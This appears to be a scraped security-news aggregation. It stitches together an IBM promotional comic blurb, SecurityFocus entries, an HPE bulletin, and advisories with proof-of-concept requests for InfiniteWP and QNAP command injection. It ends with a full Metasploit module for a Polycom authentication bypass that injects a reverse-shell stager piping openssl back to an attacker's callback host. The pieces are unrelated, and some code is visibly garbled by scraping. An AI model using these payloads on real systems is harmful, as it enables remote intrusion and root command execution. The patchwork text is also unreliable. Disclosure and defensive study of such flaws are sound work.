Command

Welcome to “In Security,” the new web comic that takes a lighter look at the dark wave of threats crashing across business networks, endpoints, data and users. Click here for an introduction to the team and be sure to read Episode 001 and Episode 002.

Every App team visits the X-Force Cyber Range

Now that EveryApp has seen the Pandapocalypse attacks occur in real time, will they need to sing another chorus of “Where do we go from here?” next episode? Most likely!

How the Command Center Can Help

Network and IT security is no longer a point solution placed on the perimeter. It’s no longer one simple scenario that has a linear playbook of answers. Today’s malicious actors are attackers on all fronts of the ever-expanding enterprise. When businesses make a move to enable themselves with new technology, those that would cause harm won’t be far behind in exploiting any open and available sieves.

The EveryApp team made the right call to visit the Cambridge Command Center to assess the current threat landscape and learn the steps toward rapid remediation. But tomorrow will be a different day.

What about your organization? Are you prepared for today’s threats? What about tomorrow’s unknowns?

Learn More

Interested in learning more about how IBM’s X-Force Command Centers will help clients stay ahead of the most advanced threats? You can:

  • Visit the XFCC website.
  • Read the data sheet, “How IBM X-Force Command Centers Are Changing Security.”
  • Download the white paper, “The Role of Cyber Ranges and Capture the Flag Exercises in Security Incident Response Planning.”
  • Watch the video.


Security Intelligence

  • info
  • discussion
  • exploit
  • solution
  • references
Veritas NetBackup Appliance CVE-2016-7399 Arbitrary Command Execution Vulnerability

Bugtraq ID: 94384
Class: Input Validation Error
CVE: CVE-2016-7399
Remote: Yes
Local: No
Published: Nov 17 2016 12:00AM
Updated: Nov 17 2016 12:00AM
Credit: Matthew Hall.
Vulnerable: Veritas NetBackup Appliance 2.7.2
Veritas NetBackup Appliance 2.7.1
Veritas NetBackup Appliance 2.6.1.2
Veritas NetBackup Appliance 2.6.1.0
Veritas NetBackup Appliance 2.6.0.4
Veritas NetBackup Appliance 2.6.0.0
Not Vulnerable:


SecurityFocus Vulnerabilities

  • info
  • discussion
  • exploit
  • solution
  • references
LibTIFF '_TIFFVGetField()' Function Arbitrary Command Execution Vulnerability

Bugtraq ID: 85953
Class: Boundary Condition Error
CVE: CVE-2016-3632
Remote: Yes
Local: No
Published: Apr 08 2016 12:00AM
Updated: Sep 14 2016 07:00PM
Credit: Kaixiang Zhang of the Cloud Security Team, Qihoo 360
Vulnerable: Oracle VM Server for x86 3.4
Oracle VM Server for x86 3.3
Oracle Linux 7.0
Oracle Linux 6.0
LibTIFF LibTIFF 4.0.3
LibTIFF LibTIFF 4.0.2
LibTIFF LibTIFF 3.9.4
LibTIFF LibTIFF 3.9.3
LibTIFF LibTIFF 3.9.2
LibTIFF LibTIFF 3.9
LibTIFF LibTIFF 3.8.2
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
LibTIFF LibTIFF 3.8.1
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
LibTIFF LibTIFF 3.8
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
LibTIFF LibTIFF 3.7.4
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
LibTIFF LibTIFF 3.7.3
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
LibTIFF LibTIFF 3.7.2
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
LibTIFF LibTIFF 3.7.1
LibTIFF LibTIFF 3.7
+ Slackware Linux 10.0
+ Slackware Linux -current
LibTIFF LibTIFF 3.6.1
+ Gentoo Linux 1.4
+ Gentoo Linux
+ OpenPKG OpenPKG Current
+ Turbolinux Turbolinux Server 10.0
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
LibTIFF LibTIFF 3.6
LibTIFF LibTIFF 3.5.7
+ Redhat Fedora Core2
+ Slackware Linux 9.1
+ Slackware Linux 9.0
+ Slackware Linux 8.1
+ Turbolinux Appliance Server Hosting Edition 1.0
+ Turbolinux Appliance Server Workgroup Edition 1.0
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
LibTIFF LibTIFF 3.5.6
LibTIFF LibTIFF 3.5.5
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
LibTIFF LibTIFF 3.5.4
LibTIFF LibTIFF 3.5.3
LibTIFF LibTIFF 3.5.2
LibTIFF LibTIFF 3.5.1
LibTIFF LibTIFF 3.4
LibTIFF LibTIFF 4.0.6
LibTIFF LibTIFF 4.0.5
LibTIFF LibTIFF 4.0.4
LibTIFF LibTIFF 4.0.1
LibTIFF LibTIFF 4.0
LibTIFF LibTIFF 3.9.5
LibTIFF LibTIFF 3.9.1
IBM SmartCloud Entry 3.2
IBM SmartCloud Entry 3.1
IBM SmartCloud Entry 2.3 Fix Pack 1
IBM SmartCloud Entry 2.3 Appliance fix pack 6
IBM SmartCloud Entry 2.3 Appliance fix pack 4
IBM SmartCloud Entry 2.2 Fix Pack 2
IBM SmartCloud Entry 2.2 Fix Pack 1
IBM SmartCloud Entry 2.2 Appliance fix pack 6
IBM SmartCloud Entry 2.2 Appliance fix pack 4
IBM SmartCloud Entry 2.2
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.1.0.4 Appliance FP
IBM SmartCloud Entry 3.1.0.4 Appliance FP
IBM SmartCloud Entry 3.1.0.4 Appliance FP
IBM SmartCloud Entry 3.1.0.4 Appliance FP
IBM SmartCloud Entry 3.1.0.4 Appliance FP
IBM SmartCloud Entry 3.1.0.4 Appliance FP
IBM SmartCloud Entry 3.1.0.4 Appliance FP
IBM SmartCloud Entry 2.4.0.4 Appliance Fi
IBM SmartCloud Entry 2.4.0
IBM SmartCloud Entry 2.3.0.4 Appliance Fi
IBM SmartCloud Entry 2.3.0
IBM SmartCloud Entry 2.2.0.4 Appliance Fi
IBM SmartCloud Entry 2.2.0.3 Appliance FP
IBM SmartCloud Entry 2.2.0.3 Appliance FP
Not Vulnerable:


SecurityFocus Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c052577
11

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c05257711
Version: 1

HPSBST03640 rev.1 - HP XP7 Command View Advance Edition Suite (CVAE) using
Replication Manager (RepMgr) and Device Manager (DevMgr), Local Access
Restriction Bypass

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2016-09-01
Last Updated: 2016-09-01

Potential Security Impact: Local Access Restriction Bypass

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified in HP XP7 Command View
Advance Edition Suite (CVAE) using Replication Manager (RepMgr) and Device
Manager (DevMgr). This vulnerability could be locally exploited to allow
access restriction bypass.

References:

- CVE-2016-4381
- PSRT110214

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP XP7 Command View Advanced Edition Suite RepMgr and DevMgr version 6.2.0-00
to versions prior to 8.4.1-02

BACKGROUND

CVSS Base Metrics
=================
Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2016-4381
5.3 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L
4.6 (AV:L/AC:L/Au:N/C:P/I:P/A:P)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c013454
99

RESOLUTION

HPE has released the following software updates to resolve the vulnerability
in HP XP7 Command View Advance Edition Suite.

- Device Manager (DevMgr) version 8.4.1-02
- Replication Manager (RepMgr) version 8.4.1-02

The updates are available from the following locations.

- Full installer updates:

https://h20575.www2.hp.com/usbportal/softwareupdate.do

- Patches:

https://h20575.www2.hpe.com/tsusbportal/index.do?lc=EN_US&src=HPSC

**Note:** A valid HPE Passport account is needed to download the patches.
Please contact HPE Technical Support for assistance.

HISTORY
Version:1 (rev.1) - 1 September 2016 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert (at) hpe (dot) com. [email concealed]

Report: To report a potential security vulnerability for any HPE supported
product:
Web form: https://www.hpe.com/info/report-security-vulnerability
Email: security-alert (at) hpe (dot) com [email concealed]

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2016 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBAgAGBQJXyJX9AAoJEGIGBBYqRO9/M/wH/26FtoAFFJZ2vb9Y3nF3rIzu
lS0Vd+kOf45OVntpJ3e5MLISEBWMxdibNTG49iXsqS0H/BsEV9j09oAHHjCpwylk
OwPB0v0xVzCuI3mUgQ8ANBj4oIkYzRv0vfwbAwpMrrAA2goLxijhxxUR9sE4Zrz3
93FwNW2H/IUq7ma5LCUDzudNgDfXR6iTH7zKJKLYDz/mPBwD/IJGtv8Si6O5oZ03
hUOqNl6irkP+415K358PU927CcQcFkLY+Wv3OsitG+w1AILRE5IV4aqIPVJCPwUl
U9vTn5jyVkHz0FHr45eK6V+ts2xaGbKYcW4fYIzfAoYUO/YBULiZ8Zwlr/TNM+g=
=Dh4J
-----END PGP SIGNATURE-----

[ reply ]


SecurityFocus Vulnerabilities

------------------------------------------------------------------------
Command injection in InfiniteWP Admin Panel
------------------------------------------------------------------------
Sipke Mellema, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
The InfiniteWP Admin Panel can be used to execute arbitrary system
commands. The vulnerability can be exploited using an authorization
bypass or by making an authorized user visit a specially crafted URL.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0006

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on IWPAdminPanel version 2.8.0.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in IWPAdminPanel version 2.9.0.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/command_injection_in_infinitewp_admin_panel.html

The file ajax.php can be used to execute arbitrary system commands on a system running the InfiniteWP plugin Admin Panel. When an authorized user calls ajax.php, the handler method from the panelRequestManager class is called:

$ result = panelRequestManager::handler($ _REQUEST);

In this handler an if statement will check access levels, if the method userRestrictChecking is implemented. However, this method is not implemented in the default (free) version.

The code will follow on with converting user input to multiple variables.

$ actionResult = $ data = array();
$ action = $ requestData['action'];
$ siteIDs = $ requestData['args']['siteIDs'];
$ params = $ requestData['args']['params'];
$ extras = $ requestData['args']['extras'];
$ requiredData = $ requestData['requiredData'];

Later on in the code, the method requiredData is called with user data as an argument.

$ data = self::requiredData($ requiredData);

The method requiredData will try to execute methods supplied by the user, using the method evaluateMethod. Multiple methods are allowed.

foreach($ requiredData as $ action => $ args){
$ data[$ action] = self::evaluateMethod($ action, $ args);

The evaluateMethod method will check if the requested action exists in the panelRequestManager class. If so, the action will be called with the arguments as requested by the user. If the method does not exist in the panelRequestManager class, the code will check if the action exists in the array self::$ addonFunctions. If it is, the action will get executed.

public static function evaluateMethod($ action, $ args)
if(method_exists('panelRequestManager', $ action)){
if($ action == 'getSitesUpdates'){
return self::$ action($ GLOBALS['userID']);
else
return self::$ action($ args);

eif(in_array($ action, self::$ addonFunctions) && function_exists($ action)){
return call_user_func($ action, $ args);

By default, users can only execute commands that are contained in the panelRequestManager class, or in self::$ addonFunctions. But the panelRequestManager class includes a method called addFunctions that can be used to add methods to the array of methods that can be called from evaluateMethod. It's possible to invoke the addFunctions method to include system commands in the list of allowed methods.

public static function addFunctions()
$ args = func_get_args();
self::$ addonFunctions = array_merge(self::$ addonFunctions, $ args);

The vulnerability can be exploited using an authorization bypass or by making an authorized user visit a URL.
Proof of concept

Have a logged in user visit the following URL:
http://www.<webserver>.com/IWPAdminPanel_v2.8.0/ajax.php?action=foo&requiredData%5BaddFunctions%5D=system&requiredData%5Bsystem%5D=whoami

It should now look something like:

"actionResult":[],"data":{"addFunctions":null,"system":"www-data"...

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.


Exploit Files ≈ Packet Storm

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2016-054
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.1 Build 20160601
Tested Version(s): 4.2.1 Build 20160601 - 4.2.2 Build 20160812
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: unfixed
Manufacturer Notification: 2016-06-07
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices[1].

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The SySS GmbH found an os command injection in the appRequest plugin of
the current QTS administrative interface.

This type of vulnerability allows an attacker to run arbitrary commands
on the operating system of the host as root.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. Log in to the QNAP. The user needs no special privileges.
2. Run a request like the following:

==
POST /cgi-bin/application/appRequest.cgi?&action=getRemoteRSS HTTP/1.1
Host: 192.168.42.201:8080
Content-Length: 39

lang=geryyy><&subfunc=qpkg&sid=[validSid]

==
3. The lang-Parameter will be placed inside of a wget-command without
encoding or sanitizing the string. It will be shortened to only 8
characters lengths, making exploiting difficult. Still e.g. overwriting
critical data would be easy.

The above requests displays an error message in the header, similar to
the following:

HTTP/1.1 200 OK
Date: Tue, 07 Jun 2016 05:57:57 GMT
sh: -c: line 0: syntax error near unexpected token `<'
sh: -c: line 0: `/usr/bin/wget -t 1 -T 30 -q http://download.qnap.com/Liveupdate/QTS4.2.1/qpkgcenter_geryyy><hPThy<}hPSa .xml -O /home/httpd/RSS/rssdoc/qpkgcenter_geryyy><hPThy<}hPSa .xml.tmp 1>>/dev/null 2>>/dev/null'
Content-type: text/xml
Content-Length: 4587

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should ensure that only
trusted users/administrators have access to the device.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2016-06-07: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-054
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-054.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: [email protected]
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWVoAAoJENEtJqSRgP2ydA0H/jHyaW0S//do0y13oEWH1n8O
QAwTKnWY5SiPOZ6CdEFh+W7VsuZsh5QupIHFm/mYRPZ3gfBmFc/Pk9f/qQFCoHmc
6whFVm/E8WbwasHUo4uLEiFwFOsCSG2j+45+DqF5YIWXQZm/Fk7q+AlSEqQo169+
kvXoZpGD81JAq0TwzpbKFExwip+zxlSdkjffwXoJcNijD1DXIRjx1j5qML9P5W/h
UJVCkAiAoICJf8Cei6jrIDN/LjvHHWtw2R7AFw0Eic3CQjkdWFqAHOEV6s7CNQjD
Rrr3za7BPN6CUe098BDbnXhmIFu4T2ZbJ+88jPMXHUv5NcvZ7SwSIE++uYQ0FmI=
=LzeJ
-----END PGP SIGNATURE-----


Exploit Files ≈ Packet Storm

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report

def initialize(info = )
super(
update_info(
info,
'Name' => 'Polycom Command Shell Authorization Bypass',
'Alias' => 'psh_auth_bypass',
'Author' =>
[
'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # module
'h00die <[email protected]>', # submission/cleanup
],
'DisclosureDate' => 'Jan 18 2013',
'Description' => %q(
The login component of the Polycom Command Shell on Polycom HDX
video endpints, running software versions 3.0.5 and earlier,
is vulnerable to an authorization bypass when simultaneous
connections are made to the service, allowing remote network
attackers to gain access to a sandboxed telnet prompt without
authentication. Versions prior to 3.0.4 contain OS command
injection in the ping command which can be used to execute
arbitrary commands as root.
),
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf' ],
[ 'URL', 'http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html' ],
[ 'EDB', '24494']
],
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Targets' => [ [ "Universal", ] ],
'Payload' =>

'Space' => 8000,
'DisableNops' => true,
'Compat' => { 'PayloadType' => 'cmd'
},
'DefaultOptions' => 'PAYLOAD' => 'cmd/unix/reverse_openssl' ,
'DefaultTarget' => 0
)
)

register_options(
[
Opt::RHOST(),
Opt::RPORT(23),
OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]),
OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ])
], self.class
)
register_advanced_options(
[
OptInt.new('THREADS', [false, 'Threads for authentication bypass', 6]),
OptInt.new('MAX_CONNECTIONS', [false, 'Threads for authentication bypass', 100])
], self.class
)
end

def check
connect
sock.put(Rex::Text.rand_text_alpha(rand(5) + 1) + "\n")
Rex.sleep(1)
res = sock.get_once
disconnect

if !res && !res.empty?
return Exploit::CheckCode::Safe
end

if res =~ /Welcome to ViewStation/
return Exploit::CheckCode::Appears
end

Exploit::CheckCode::Safe
end

def exploit
# Keep track of results (successful connections)
results = []

# Random string for password
password = Rex::Text.rand_text_alpha(rand(5) + 1)

# Threaded login checker
max_threads = datastore['THREADS']
cur_threads = []

# Try up to 100 times just to be sure
queue = [*(1..datastore['MAX_CONNECTIONS'])]

print_status("Starting Authentication bypass with #datastore['THREADS'] threads with #datastore['MAX_CONNECTIONS'] max connections ")
until queue.empty?
while cur_threads.length < max_threads

# We can stop if we get a valid login
break unless results.empty?

# keep track of how many attempts we've made
item = queue.shift

# We can stop if we reach max tries
break unless item

t = Thread.new(item) do |count|
sock = connect
sock.put(password + "\n")
res = sock.get_once

until res.empty?
break unless results.empty?

# Post-login Polycom banner means success
if res =~ /Polycom/
results << sock
break
# bind error indicates bypass is working
elsif res =~ /bind/
sock.put(password + "\n")
# Login error means we need to disconnect
elsif res =~ /failed/
break
# To many connections means we need to disconnect
elsif res =~ /Error/
break
end
res = sock.get_once
end
end

cur_threads << t
end

# We can stop if we get a valid login
break unless results.empty?

# Add to a list of dead threads if we're finished
cur_threads.each_index do |ti|
t = cur_threads[ti]
unless t.alive?
cur_threads[ti] = nil
end
end

# Remove any dead threads from the set
cur_threads.delete(nil)

Rex.sleep(0.25)
end

# Clean up any remaining threads
cur_threads.each

if !results.empty?
print_good("#rhost:#rport Successfully exploited the authentication bypass flaw")
do_payload(results[0])
else
print_error("#rhost:#rport Unable to bypass authentication, this target may not be vulnerable")
end
end

def do_payload(sock)
# Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])

# Start a listener
start_listener(true)

# Figure out the port we picked
cbport = self.service.getsockname[2]

# Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128
cmd = "\nping ;s=$ IFS;openssl$ ss_client$ s-quiet$ s-host$ s#cbhost$ s-port$ s#cbport|sh;ping$ s-c$ s1$ s0\n"
sock.put(cmd)

# Give time for our command to be queued and executed
1.upto(5) do
Rex.sleep(1)
break if session_created?
end
end

def stage_final_payload(cli)
print_good("Sending payload of #payload.encoded.length bytes to #cli.peerhost:#cli.peerport...")
cli.put(payload.encoded + "\n")
end

def start_listener(ssl = false)
comm = datastore['ListenerComm']
if comm == 'local'
comm = ::Rex::Socket::Comm::Local
else
comm = nil
end

self.service = Rex::Socket::TcpServer.create(
'LocalPort' => datastore['CBPORT'],
'SSL' => ssl,
'SSLCert' => datastore['SSLCert'],
'Comm' => comm,
'Context' =>

'Msf' => framework,
'MsfExploit' => self

)

self.service.on_client_connect_proc = proc

# Start the listening service
self.service.start
end

# Shut down any running services
def cleanup
super
if self.service
print_status("Shutting down payload stager listener...")
begin
self.service.deref if self.service.is_a?(Rex::Service)
if self.service.is_a?(Rex::Socket)
self.service.close
self.service.stop
end
self.service = nil
rescue ::Exception
end
end
end

# Accessor for our TCP payload stager
attr_accessor :service
end


Exploit Files ≈ Packet Storm